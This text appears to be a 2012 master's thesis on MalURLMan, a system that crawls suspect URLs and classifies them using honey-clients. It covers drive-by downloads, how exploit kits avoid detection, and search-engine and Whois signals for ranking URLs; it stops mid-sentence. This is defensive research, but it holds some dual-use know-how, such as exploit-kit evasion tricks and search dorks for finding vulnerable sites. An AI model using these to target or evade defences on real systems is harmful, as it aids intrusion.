URL Crawling & Classification System

Emil Vaagland

June 2012
Abstract
Today, malware is often found on legitimate web sites that have been hacked. The
aim of this thesis was to create a system to crawl potentially malicious web sites and
rate them as malicious or not. Through research into current malware trends and
mechanisms to detect malware on the web, we analyzed and discussed the problem
space before designing the system architecture. After we had implemented our
suggested architecture, we ran the system through tests. These tests shed some
light on the challenges we had discussed. We found that our hybrid honey-client
approach was beneficial for detecting malicious sites, as some malicious sites were
only found when both honey-clients cooperated. In addition, we got insight into how
a LIHC can be useful as a queue pre-processor for a HIHC. On top of that, we
learned the consequence of operating a system like this without a well-built proxy
server network: false-negatives.
Norwegian Abstract

Today it is common to find malware on hacked web sites. The goal of this master's
thesis was to create a system to find and analyze potential web sites hosting malware,
and to classify them as malicious or not. Through research into current malicious
threats on web sites and methods to detect them, we analyzed and discussed the
problems before proposing a system architecture. After we had implemented the
system, we ran it through tests. These tests shed light on some of the problems we
had discussed. We found that our configuration with two different honey-clients was
useful for detecting malicious web sites, since some malicious sites were only found
when the two exchanged data. In addition, we gained insight into how a so-called
low-interaction honey-client can be useful for pre-processing the analysis queue of a
so-called high-interaction honey-client. Furthermore, we learned the consequence of
running such a system without support for proxy servers: false negatives in the
honey-client analyses.
Preface
This report describes the work I have carried out as a part of my master’s thesis in
Information Security in the 10th semester of the Master’s Program in Communication
Technology at the Norwegian University of Science and Technology.
I would like to thank my supervisor Svein Johan Knapskog for input and good
feedback during the whole period. I would also like to thank my co-supervisors Felix
Leder and Trygve Brox at Norman ASA for feedback, technical assistance, and access
to Norman's MAG2 system.
Acronyms
AS Autonomous System
Contents
Abstract iii
Norwegian Abstract v
Preface vii
Acronyms ix
1 Introduction 1
1.1 Motivation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
1.2 Scope and objectives . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
1.3 Related work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
1.4 Limitations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
1.5 Method . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
2 Background 5
2.1 Client-Side Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
2.1.1 Clients . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
2.1.2 Malicious sites . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
2.1.3 Browser Exploit Packs . . . . . . . . . . . . . . . . . . . . . . 9
2.2 Honey-Clients . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
2.2.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
2.2.2 Low-Interaction Honey-Clients . . . . . . . . . . . . . . . . . . 10
2.2.2.1 PhoneyC and Thug . . . . . . . . . . . . . . . . . . . 11
2.2.2.2 HoneyC . . . . . . . . . . . . . . . . . . . . . . . . . 12
2.2.3 High-Interaction Honey-Clients . . . . . . . . . . . . . . . . . 12
2.2.3.1 Malware Analyzer G2 . . . . . . . . . . . . . . . . . 13
2.2.3.2 Capture-HPC / Capture-HPC NG . . . . . . . . . . 13
2.3 Similar systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
2.3.1 HoneySpider Network . . . . . . . . . . . . . . . . . . . . . . . 14
2.3.2 Google Safe Browsing . . . . . . . . . . . . . . . . . . . . . . . 16
2.3.3 urlQuery.net . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
2.3.4 International Secure Systems Lab . . . . . . . . . . . . . . . . 17
2.4 Open Source Intelligence . . . . . . . . . . . . . . . . . . . . . . . . . 17
2.4.1 Search Engine Intelligence . . . . . . . . . . . . . . . . . . . . 17
2.4.2 Whois information . . . . . . . . . . . . . . . . . . . . . . . . 19
2.4.3 IP/DNS Information . . . . . . . . . . . . . . . . . . . . . . . 19
2.5 URL Seed . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
2.5.1 Trends and Search Engine Poisoning . . . . . . . . . . . . . . 20
2.5.2 Searching for various strings . . . . . . . . . . . . . . . . . . . 20
2.5.3 Email Spam boxes . . . . . . . . . . . . . . . . . . . . . . . . 22
2.5.4 Social media sites . . . . . . . . . . . . . . . . . . . . . . . . . 22
3 Challenges 23
3.1 Perpetual work load . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
3.2 Analysis Result Validity . . . . . . . . . . . . . . . . . . . . . . . . . 24
3.3 Avoiding Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
3.4 Independent analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
3.5 URL Prioritization . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
3.6 Selecting and Operating HIHC Configurations . . . . . . . . . . . . . 28
3.7 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
4 System architecture 30
4.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
4.2 Technical Limitations . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
4.3 MalURLMan Use of Zend Framework . . . . . . . . . . . . . . . . . . 32
4.4 Honey-Client Selection . . . . . . . . . . . . . . . . . . . . . . . . . . 33
4.4.1 Low-Interaction Honey-Client: Thug . . . . . . . . . . . . . . 33
4.4.2 High-Interaction Honey-Client: Capture-HPC NG . . . . . . . 34
4.4.3 High-Interaction Honey-Client: MAG2 . . . . . . . . . . . . . 35
4.5 MalURLMan Access points . . . . . . . . . . . . . . . . . . . . . . . . 35
4.5.1 REST API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
4.5.2 ZF Environment . . . . . . . . . . . . . . . . . . . . . . . . . 36
4.6 URL Import and Queuing . . . . . . . . . . . . . . . . . . . . . . . . 36
4.6.1 Sources and Import . . . . . . . . . . . . . . . . . . . . . . . . 37
4.6.2 Queue . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
4.7 Honey-Client Analysis Modules . . . . . . . . . . . . . . . . . . . . . 37
4.7.1 Thug Analysis Module . . . . . . . . . . . . . . . . . . . . . . 38
4.7.1.1 Thug.php . . . . . . . . . . . . . . . . . . . . . . . . 38
4.7.1.2 Thug_results.php . . . . . . . . . . . . . . . . . . . 39
4.7.1.3 Thug_mag2_sample.php . . . . . . . . . . . . . . . 40
4.7.2 MAG2 Analysis Module . . . . . . . . . . . . . . . . . . . . . 41
4.7.2.1 Mag2.php . . . . . . . . . . . . . . . . . . . . . . . . 42
4.7.2.2 Mag2_results.php . . . . . . . . . . . . . . . . . . . 43
4.7.2.3 mag2_page.php . . . . . . . . . . . . . . . . . . . . 44
4.8 Open Source Intelligence Modules . . . . . . . . . . . . . . . . . . . . 44
4.9 URL Rating Scheme . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
5 System Evaluation 46
5.1 MalURLMan Features . . . . . . . . . . . . . . . . . . . . . . . . . . 46
5.2 MalURLMan Usage Example 1 . . . . . . . . . . . . . . . . . . . . . 47
5.2.1 URL Import . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
5.2.2 URL Queue . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
5.2.3 Test Discussion . . . . . . . . . . . . . . . . . . . . . . . . . . 49
5.3 MalURLMan Usage Example 2 . . . . . . . . . . . . . . . . . . . . . 51
5.3.1 Thug Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
5.3.2 MAG2 Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . 52
5.3.3 Test Discussion . . . . . . . . . . . . . . . . . . . . . . . . . . 52
6 Conclusion 54
6.1 Future Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
Bibliography 56
A Screenshots 59
A.1 Vendors.pro Sales Ad . . . . . . . . . . . . . . . . . . . . . . . . . 59
A.2 Blackhole Exploit Kit Screenshots . . . . . . . . . . . . . . . . . . . . 60
A.2.1 Statistics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60
A.2.2 Block List Functionality . . . . . . . . . . . . . . . . . . . . . 61
A.3 Google Safe Browsing Report . . . . . . . . . . . . . . . . . . . . . . 62
B Source Code 63
B.1 Thug MAEC Log Example . . . . . . . . . . . . . . . . . . . . . . . . 63
B.2 Zend Framework Bootstrap script . . . . . . . . . . . . . . . . . . . . 67
B.3 Malware.com.br Import Script . . . . . . . . . . . . . . . . . . . . . . 68
B.4 Malware.com.br Test Import Script . . . . . . . . . . . . . . . . . . . 69
B.5 Malwaredomainlist Import Script . . . . . . . . . . . . . . . . . . . . 71
B.6 Core.php . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
B.7 DNS.php . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74
B.8 Ping.php . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77
B.9 Whois.php . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
B.10 Thug.php . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83
B.11 Thug_results.php . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
B.12 MAG2.php . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
B.13 MAG2 results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90
B.14 MAG2 Thug Sample . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
B.15 MAG2 Risk . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97
B.16 MySQL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99
List of Tables
List of Figures
A.1 Here we see the vendor of the Black Hole exploit kit advertising its
features on the Russian board vendors.pro. This screenshot was taken
on 12.4.2012, and it was automatically translated from Russian to En-
glish using Google Chrome. It is not the latest version of Blackhole,
but it showcases how advanced it was at that time. . . . . . . . . . . 59
A.2 The statistics view in the Black Hole Exploit Kit, source: http://www.xylibox.com/search/label/blackhole . . . 60
A.3 Blackhole block list functionality . . . . . . . . . . . . . . . . . . . . 61
A.4 Google Safe Browsing Report for comment-twitt.ru . . . . . . . . . . 62
Chapter 1
Introduction
1.1 Motivation
Today, most computers get infected with malware when they are used to browse
legitimate web sites. Cyber criminals have a big attack surface if we consider the
complexity of today's web browsers, which have support for JavaScript and third-
party plug-ins like Adobe Flash, Adobe PDF Reader, and Java. As a result, new
security vulnerabilities are reported every week, and probably even more are found
and exploited in the wild before they are detected and reported. Therefore, in order
to protect users browsing the web from getting exploited and infected by malware,
we need a system that is able to detect both known and unknown exploits on
web sites.
At present, malware on the web is complex and easy to deploy. It is possible to
rent so-called browser exploit packs on internet boards, which are packs created by
professional malware vendors. These kits have many features, such as serving exploits
based on what type of client is visiting, and they even have mechanisms to avoid
detection by anti-virus vendors and other detection mechanisms. As a consequence,
crawling the web with an old-fashioned crawler and running the crawled web sites
through an anti-virus scan will not necessarily detect malware. Instead of crawling
the web blindly, we need a smarter way to gather URLs that are likely to be malicious,
and ways to reliably detect and manage malicious URLs.
Security researchers have developed methods for detecting malicious web sites
based on the concept of honey-clients. Honey-clients are divided into high-interaction
and low-interaction honey-clients, where the low-interaction variant is based on emu-
lated clients, whereas the high-interaction variant is based on real clients, usually in a
virtualized machine. Both variants have pros and cons which suit different needs.
By developing a system that can retrieve URLs from any customized source, and
analyze these URLs with analysis modules such as honey-clients, we can effectively
detect malicious web sites. This thesis will focus on building the foundation of such
a system.
1.3 Related work

Google researchers have published papers on the prevalence of malware on the web
based on Google's web page repository, and their architecture for detecting malicious
web pages was described in both papers. The most similar project is the HoneySpider
Network¹, which has been in active development since 2007, with over 20 people
involved over the years. Their goal is to develop a system to process bulk volumes of
URLs to detect and identify malicious URLs. In addition, the HSN project has
released their own adaptation of the high-interaction honey-client Capture-HPC,
called Capture-HPC NG².
1.4 Limitations

Considering the six-month timeframe of this project, and looking at other similar
projects like the HSN project, it is obvious that time is the main limitation of this
project, restricting how much of the system we can design and implement. Therefore,
the focus of this thesis will be on creating the foundation elements of a system to
analyze and manage malicious URLs, by implementing support for already existing
URL analysis software such as honey-clients.
1.5 Method
To achieve the goals of this project we are going to use the following method:
• Review the state of the art in this field and research malware and similar
existing systems to form the basis of this system.
¹ The HoneySpider Network project is a joint venture between NASK/CERT Polska,
GOVCERT.NL, and SURFnet: http://www.honeyspider.net
² Capture-HPC NG can be found here: http://pl.honeynet.org/HoneySpiderNetworkCapture/
Chapter 2
Background
Today, most applications are deployed on the web, and users access these web ap-
plications with their clients, which is usually a modern web browser with support for
third-party plug-ins. Today's browsers, such as Microsoft Internet Explorer (MSIE),
Google Chrome, Apple Safari, and Mozilla Firefox, all support complex client-side
operations through JavaScript, and render a wide variety of content through
included libraries. These browsers also support plugins such as Adobe Flash, Java,
and Adobe PDF Reader, which are maintained by third parties. As the complexity
of web browsers and their third-party plugins increases, the attack surface for
exploit writers increases as well. The code base of Google Chrome alone consists of
millions of lines of code¹.
2.1.1 Clients
The most common web browsers on the web today are Chrome, MSIE, Firefox, Safari,
and Opera, with Chrome just passing MSIE as the most popular browser; see figure
2.1 for an overview of the usage percentages. Seeing that Chrome is gaining market
share very rapidly, it is likely that more exploit writers will focus on finding exploits
for Chrome. This should be taken into consideration when choosing the software
combination for a high-interaction honey-client configuration. However, it should be
noted that most Browser Exploit Packs (see section 2.1.3) ship with exploits that
attack the plugins used by browsers, to make their attack vectors independent of the
browser, as seen in the BlackHole Exploit Kit sales ad in A.1. Instead of having
specific exploits that target platform-specific browsers, they target cross-platform
technologies such as Java and Adobe Flash to reach a larger share of the potential
victims.
¹ http://www.ohloh.net/p/chrome/analyses/latest
² SQL injection attacks are possible when SQL queries against database backends
incorporate user-provided data that has not been properly sanitized by the developer,
leaving the query open to manipulation, so that attackers can run custom SQL
queries against the database.
As we can see in A.2.1, from a live instance of Black Hole, the most successful exploit
in this case is a Java exploit targeting all platforms³.
Figure 2.1: Top 5 Browsers from W20 2011 to W20 2012, from [1]
2.1.2 Malicious sites

A typical attack starts when a victim visits a legitimate web site that has been
compromised and injected with code that silently redirects the browser to an exploit
server, which, after a successful exploitation, makes the client download and execute
malware from a malware distribution site. This kind of attack is not noticeable by
the target, and anyone who is vulnerable to the attack gets infected by merely visiting
the seemingly legitimate site. Therefore, this kind of attack is called a Drive-by
Download[9]. These client-side attacks are on the rise[10]. See Figure 2.2 for a
schematic overview of an example Drive-by Download attack.

1. The user visits an infected, seemingly legitimate web site.

2. The infected site sends a normal response back to the user while it stealthily
triggers a vulnerability in the client that downloads and runs the malware loader.

3. The malware loader contacts a malware distribution site.

4. The malware distribution site sends the full malware payload, and the loader
executes it on the victim.

This is just one of several models for Drive-by Downloads. More complex patterns
with more redirects exist, where the user gets redirected to an exploit host before the
malware loader is executed.
Another recent advancement in detection avoidance for BEPs was found in Nuclear
Pack version 2.0[16], which only executes its exploit code if mouse movement is
detected via JavaScript. This effectively renders honey-clients that do not emulate
mouse movement useless for detecting this exploit.
2.2 Honey-Clients
In this section we will go through some different honey-clients and look into their
capabilities.
2.2.1 Introduction
A honeypot is a vulnerable server system set up to lure attackers into exploiting it,
so that researchers can observe and analyze what is being done. Instead of passively
waiting for attackers to exploit a honeypot, honey-clients actively visit malicious
content in order to detect attacks. Honey-clients are systems that run a client ap-
plication against potentially malicious web sites. Honey-clients are divided into low-
interaction honey-clients (LIHC) and high-interaction honey-clients (HIHC), where
the high-interaction variants run a real OS with real vulnerable client software,
and the low-interaction variants are applications emulating the behavior of client
applications. Both types have strengths and weaknesses. In general, LIHCs are fast
and easy to manage and deploy, whereas HIHCs are slower and more difficult to
manage and deploy. However, HIHCs are much more likely to detect new attacks
and obtain malware samples, whereas low-interaction honey-clients do not detect
new attacks. In the following subsections we will look into what kind of features
different kinds of honey-clients have.
2.2.2 Low-Interaction Honey-Clients

Low-interaction honey-clients emulate client applications instead of running real ones.
Because of this, they can visit URLs with different browser personalities from the
same installation. In addition, these clients are much safer, because real exploits for
MSIE on Windows will not damage an emulated client on a Linux machine pretending
to be MSIE on Windows. Furthermore, since LIHCs are light-weight, they are easier
to deploy on a large scale. Still, the biggest drawback with these types of clients is
that they are easy to detect, because they are emulated and not based on real
systems. Another drawback is that they cannot detect 0-day attacks, only known
attacks. Usually, detection mechanisms for LIHCs are based on signatures from
intrusion detection systems (IDS) like Snort⁶ or anti-virus engines. Therefore, these
types of clients can be used to detect known threats quickly. In the following
subsections we will present some of the current public LIHCs.
2.2.2.2 HoneyC

HoneyC is a LIHC that detects malicious web sites based on Snort signatures. The
architecture of HoneyC is based on three components: the queue, the visitor, and the
analysis engine. These three components are controlled by a core component. An
interesting feature of the queue component is that it supports collecting URLs based
on Yahoo! and Google search queries for specific keywords. However, HoneyC has
not been in active development since 2005, and features like collecting URLs from
Google search queries no longer work due to API changes¹¹.
2.2.3.2 Capture-HPC / Capture-HPC NG

The NG version works in the same way as Capture-HPC; however, it also adds a
whole range of new features to Capture-HPC, with support for new virtualization
environments like VirtualBox and KVM, extended logging, uploading URLs via file
and socket, and many bug fixes[18].
¹³ https://www.virustotal.com/
¹⁴ http://safeweb.norton.com/
¹⁵ http://www.honeyspider.net/
¹⁶ http://www.nask.pl/ and http://www.cert.pl/
¹⁷ http://www.govcert.nl/
¹⁸ http://www.surfnet.nl/
2.3.2 Google Safe Browsing

Google already crawls the whole web and has a good index of candidate URLs that
could be malicious. By applying what they call simple heuristics, they significantly
reduce the number of candidate URLs that are likely to be malicious. After de-
termining the potentially malicious URLs, the URLs are visited with Google's
Windows-based high-interaction honey-clients to verify whether the candidate URLs
are malicious. They also scan the HTTP responses using multiple anti-virus
engines[5][3]. See figure 2.4 for an overview of their architecture.
2.3.3 urlQuery.net
The urlQuery.net project was launched in 2011 and is a public service for detecting
and analyzing web-based malware. urlQuery.net provides detailed information about
the actions the browser performs when visiting a page, such as HTTP transactions
and JavaScript activity. In addition to that, it deobfuscates all known exploit kits,
and supports signatures for quick detection of known exploits through its IDS.
2.4.1 Search Engine Intelligence

The "site:" search operator²³ returns all the web pages that belong to a specified
site. This number can be used as an indication of how big the site is. For instance,
if it returns several thousand pages, we can safely assume that the site has been in
operation for a while, and is also linked to from other indexed sites. With the Google
search operator "link:"²⁴, Google returns all the pages that link to a specific URL.
By checking the reputation of these sites, we can draw some conclusions about
whether the site is good or bad, i.e., is it linked to only by suspicious sites or by
healthy sites? However, if a site has zero results with the "site:" operator, we can
safely assume that the site is brand new and not linked to by any other sites. This
can be seen as suspicious, as it may imply that the domain is used as a fast-flux
domain for a malware distribution network.
Information from search engines is not enough to classify a URL as malicious or
not. However, in combination with other information, it can be used to assess the
likely maliciousness of a URL. For instance, if we get zero results for a URL found
in a hidden iframe tag, the possibility that the iframe is loading a malicious site
increases, and we can then consider that URL a good candidate for processing in a
high-interaction honey-client.
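As an illustration, the zero-results heuristic could be expressed as follows; this is a
minimal sketch, and searchResultCount() is a hypothetical helper wrapping a search
engine API, not an existing function:

<?php
// Illustrative sketch of the zero-results heuristic described above.
// searchResultCount() is a hypothetical wrapper around a search API.
function isGoodHihcCandidate($url)
{
    $host = parse_url($url, PHP_URL_HOST);
    // A site with no indexed pages is likely brand new and unlinked,
    // which makes a hidden-iframe reference to it more suspicious.
    return searchResultCount('site:' . $host) === 0;
}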
Additionally, the LinkFromDomain operator from Bing²⁵ can be used to find all
sites that a site links to. Several interesting pieces of information can be gathered
from this. The first obvious check is to look up all the domains linked to in our
repository of already analyzed and classified sites, to see if we have determined any
of them to be malicious. If that is the case, it may be an indication that this site
may also contain malicious code. Another possibility is to do quick checks against
external blacklists like Google's Safe Browsing API²⁶ or VirusTotal, to determine
whether the URLs linked to have a history of maliciousness. Yet another approach
is to look at the types of domains linked to, and whether there are any suspicious
connections. For instance, if a Norwegian web site links to a Russian site in a hidden
iframe, it is definitely something suspicious to investigate further. Alternatively,
one could check the rating of the Autonomous System (AS) the domains point to
with BGP Ranking²⁷, or the internal reputation an AS has in MalURLMan or other
external sources.

²³ Bing site search operator: http://msdn.microsoft.com/en-us/library/ff795613
²⁴ Google search operators: http://www.googleguide.com/advancedoperators.html
²⁵ Bing LinkFromDomain operator: http://www.bing.com/community/site_blogs/b/search/archive/2006/10/16/search-macros-linkfromdomain.aspx
²⁶ https://developers.google.com/safe-browsing/
2.4.2 Whois information

Whois information can say something about when a domain was first registered and
last updated, and when it expires, in addition to its name servers. It is also often
possible to get registrant information from a Whois query, but in recent years features
like "whois protection" have become available, giving registrants more privacy. For
each top-level domain (TLD), you need to query a specific Whois server to get
information. The data delivered in response to a Whois query is in text form and
formatted in different ways depending on which Whois server you ask, which makes
it harder to parse with scripts.
²⁷ https://github.com/Rafiot/bgp-ranking
Figure 2.5: Top five categories for entering into malware networks, from [4]
TDS and BEP vendors tend to obfuscate their URL patterns by using commonly
seen URL words. For instance, one TDS²⁸ has the following pattern in its iframe
src attributes: "http://host.tld/?go=2", and Blackhole uses a very common URL
pattern, "showthread.php?t=<random number>"²⁹, which is typical of web boards.
Thus, a signature-based approach to detecting potentially malicious URLs struggles
with the same problems as traditional anti-virus engines, and it requires a lot of
work to keep up with all the different obfuscation techniques.
Vulnerable and outdated versions of commonly used web applications such as
Joomla or WordPress are very often exploited in the wild by cybercriminals. There-
fore, by monitoring which commonly used web applications and plugins have security
vulnerabilities, and creating search strings for these vulnerable applications, we could
potentially find a lot of sites that have been exploited by cybercriminals and injected
with malicious code. In fact, the Google Hacking Database³⁰ maintains a list of
search queries for both vulnerable files and vulnerable servers.
²⁸ http://urlquery.net/report.php?id=58713
²⁹ http://urlquery.net/report.php?id=58743
³⁰ http://www.exploit-db.com/google-dorks/
Thus, if we can find vulnerable URLs with these search strings, there is a real
possibility that cybercriminals have already exploited the vulnerabilities, and we may
classify the URL/host as possibly malicious and worthy of a honey-client visit.
³¹ A Klout score could be used: klout.com
Chapter 3
Challenges
3.1 Perpetual work load

Since new URLs arrive continuously, some of our system components are going to be
constantly at work. Given that a typical analysis by a HIHC takes between one and
two minutes¹, depending on the configuration, checking a batch of 3,000 URLs will
take one HIHC about 50 hours (3,000 URLs × 1 minute ≈ 50 hours). Therefore, we
should carefully consider which URLs we select for analysis in our HIHC component.
We could implement a priority mechanism in the analysis queue by giving URLs that
are likely to be malicious higher priority than URLs that are not. We will discuss
this priority mechanism in greater detail in section 3.5.
Also, after rating a URL as malicious, the system should re-evaluate the URL at
a later time to check whether it is still malicious, in order to keep false-positives
out of our ratings. If a re-evaluation shows that a URL is no longer malicious, we
have reduced the number of false-positives in our system, which is a desired feature.
Keeping the number of false-positives low should be a priority, especially if the URL
ratings generated by the system are used as blocking lists in other systems, as is done
with Safe Browsing in Google Chrome. Having the system re-evaluate URLs further
complicates the system in many aspects, including adding more work load and
exposing the system to BEP detection mechanisms. See section 3.3 for more about
avoiding detection.
3.2 Analysis Result Validity

Consider, for example, a HIHC with a Norwegian IP address visiting a site containing
a TDS-injected iframe; if that TDS does not have any buyers of Norwegian web
traffic, the client may not be exploited. However, other clients with the same system
setup but a different geographical location may be served malicious content. In
addition, if the IP we are visiting from is known to the BEP, and already blacklisted,
we might not get any malicious content at all.
What we can learn from the example above is that one check with a specific
HIHC configuration is not necessarily enough to detect a malicious site. There may
be cases where the exact same HIHC configuration gets exploited or not depending
on the geographical location of its IP. Thus, if one HIHC is not exploited, maybe
another HIHC configuration will be, and we should therefore consider visiting a URL
from different HIHC configurations. However, this requires vast amounts of resources,
including a large array of different HIHC configurations and a substantial number of
proxies in different geographical locations.
Another issue we need to consider is how long our URL rating stays valid. A
URL marked as malicious may be cleaned up at some point. Therefore, as mentioned
in section 3.1, we should always re-evaluate URLs that have been flagged as malicious,
in order to keep false-positives out of our systems. However, in order to avoid
false-negatives, we must avoid detection, which we will discuss next.
3.3 Avoiding Detection

Consider a setup where the LIHC instance runs through the same batch of URLs as
the HIHC, from the same IP, at a much faster rate. If a URL is serving a new threat
not detectable by the LIHC, the HIHC would not be able to detect it either in the
subsequent request, because it simply would not be served the same malicious page.
Therefore, making sure that a URL is not visited from the same IP by the different
analysis modules is crucial to our analysis process. Furthermore, different URLs may
contain a malicious iframe redirecting to the same BEP, and for that reason, even
visiting independent URLs may yield false-negatives, because the BEP will not serve
malicious content the second time it sees the IP. This introduces another problem
for our system: it needs to know all the URLs an IP has visited, including all the
URLs it has loaded content from when visiting a site. Seeing that it is not possible
to know in advance which other URLs a web site loads, we have to visit the page
and observe which URLs are loaded, and look especially at those URLs that raise
suspicion. We need to go through all the URLs visited and find out whether the IP
we are running our honey-client from has visited any of them before. If it has, we
should re-visit the page with a honey-client on an IP that has not seen any of those
URLs before. It is clear that we need to whitelist certain widely used URLs, such as
URLs for JavaScript libraries hosted by safe providers such as Google².
If a system like ours is to deliver reliable results, it should be able to avoid
detection and IP blocking. This can be done by implementing support for proxies.
In order to do that properly, our system must keep an overview of which URLs were
visited through which proxy. By making the system aware of this, we can create
processes that take it into account.
3.4 Independent analysis

If we base our analysis on an external system, our whole system becomes dependent
on the EULA and API restrictions of that system, and our analysis base will be
watered down if, for instance, Google decides to restrict or close down its API
entirely, or charge prohibitive amounts for each API call. Also, considering that the
work in this thesis is done for a commercial security vendor, dependence on potential
rivals should be avoided. The second reason for analytic independence is that
independent analysis of URLs is more valuable. If we can observe a malicious page
successfully exploiting an instance of our high-interaction honey-client, we receive
more information about the attack, which can be very valuable for a security vendor,
for instance if the analysis detects a new 0-day attack. However, it should be noted
that external resources can be very valuable as input for determining the likelihood
that a URL is malicious, so that we can rank URLs that are more likely to be
malicious higher in the HIHC processing queue. In the next section we go through
information that could be used to rank the priority of URLs in the processing queue.
3.5 URL Prioritization

Several sources of information can be used to rank the priority of a URL in the
processing queue. For each URL, we can, among other things:

• Query the database of our system to see if the domain, IP, AS, or country has
a history of malicious sites.

• Ask public APIs like VirusTotal, the Google Safe Browsing API, and other
blacklists whether they have a history on the URL, domain, IP, or AS.

In addition, the analysis results we can quickly get from our LIHC can be used to
look for suspicious features of the HTML/JavaScript, as described in [19].
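As a sketch of how these signals could be combined, consider a simple additive score;
the weights and field names below are illustrative assumptions, not part of
MalURLMan:

<?php
// Sketch of an additive priority score over the signals listed above.
// Weights and array keys are illustrative assumptions.
function priorityScore(array $info)
{
    $score = 0;
    if ($info['internal_history_bad']) $score += 3; // our own DB flagged domain/IP/AS
    if ($info['external_blacklisted']) $score += 3; // VirusTotal/GSB history
    if ($info['lihc_suspicious_js'])   $score += 2; // suspicious HTML/JS features [19]
    if ($info['zero_search_results'])  $score += 1; // brand-new, unlinked site
    return $score; // a higher score means earlier HIHC processing
}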
³ By HIHC configuration we mean a set of properties that defines the system: OS,
browser, plugins, and IP.
⁴ This vulnerability can be used to run arbitrary Java code outside of the sandbox:
http://schierlm.users.sourceforge.net/CVE-2011-3544.html
3.6 Selecting and Operating HIHC Configurations

Ideally, the setup would cover as wide a spectrum of configurations as possible, with
many instances of each HIHC configuration in order to analyze more URLs in parallel.
3.7 Summary

This chapter provided a more detailed view of the problems and challenges we have
to keep in mind when creating a system for crawling and rating malicious URLs. In
the next chapter we will present the architecture for our system, in which we try to
address many of the issues illustrated in this chapter. However, it should be noted
that many of these problems are beyond the scope of this thesis in terms of work
load. Thus, we will try to design the system in such a way that it can easily be
extended in the future to address them.
Chapter 4
System architecture
In the previous chapters we discussed the challenges we have to consider when
designing our system, in addition to necessary background information about the
technologies involved. In this chapter we will create an architecture for our system
and go into the technical details of the design decisions.
4.1 Introduction

One of the ideas behind this system design is to lay the foundation for a modular
system by focusing on the core functionality. In this way, the foundation can be
expanded and further improved at a later time. In short, we are going to create a
system for managing malicious URLs; we have therefore named the system MalURL-
Man, which is short for Malicious URL Manager. MalURLMan is based on three core
concepts: importing URLs, analyzing URLs, and managing the whole process. The
design of a system based on these concepts can be modeled on a typical honey-client
framework [21], which consists of just such modules for importing URLs, honey-
clients for processing URLs, and a management component to control the whole
process. We are going to expand this model a bit further by extending the analysis
modules beyond honey-clients to other information-gathering modules as well. See
figure 4.1 for an overview of the overall architecture. In the following sections we
will introduce the different modules we have based our system architecture on.
4.2 Technical Limitations
Before we lay out our system design, we should mention the limitations of our
infrastructure. We have one machine dedicated to running this system, in addition
to access to Norman's MAG2 service, which means we have one IP for our machine
and one IP for the MAG2 URL analysis tasks.
It should also be noted that we are going to focus on the core parts of the system
architecture from figure 4.1. Functionality such as an administrative front-end will
not be a focus here, due to time limitations. We will use tools such as phpMyAdmin¹
and phpMoAdmin² with simple database queries to view the data our system collects.
¹ phpMyAdmin, a tool for administration of MySQL databases: http://www.phpmyadmin.net/
² phpMoAdmin, a tool for administration of MongoDB: http://www.phpmoadmin.com/
4.3 MalURLMan Use of Zend Framework

We have created an MVC model for URLs, which allows us to access and submit
URLs from anywhere in our environment where the ZF is loaded. This is very useful,
as we can re-use the same code for saving URLs to the database in both the RESTful
controller and in other scripts bootstrapping the ZF.
All the MalURLMan modules are standalone scripts built on the ZF bootstrap.
In this way, every module has access to the whole ZF, in addition to our UrlMapper,
which can be used to, for instance, save URLs. The modules are meant to be run as
CLI cron jobs with different execution intervals, depending on what tasks they
execute.
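A minimal sketch of such a module script is shown below; the bootstrap path and
the model class names (Application_Model_Url, Application_Model_UrlMapper)
are illustrative, not the exact names used in MalURLMan:

<?php
// Sketch of a CLI module script built on the ZF bootstrap from B.2.
// File and class names are illustrative assumptions.
require_once 'bootstrap.php';

// Every module gets the same code path for saving URLs via the mapper.
$mapper = new Application_Model_UrlMapper();
$url    = new Application_Model_Url();
$url->setUrl('http://example.com/');
$url->setSource('cli-example');
$mapper->save($url); // inserts the URL into the import queue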
4.4.1 Low-Interaction Honey-Client: Thug

Thug stores its analysis events in the MAEC format in MongoDB, where any collected
samples are also stored. A full example of a MAEC analysis log can be found in B.1,
and below we describe the events and samples collections from MongoDB.
The MongoDB collection events stores MAEC analysis files. In this log format we
can find something called "dynamic analysis", which basically stores all the JavaScript
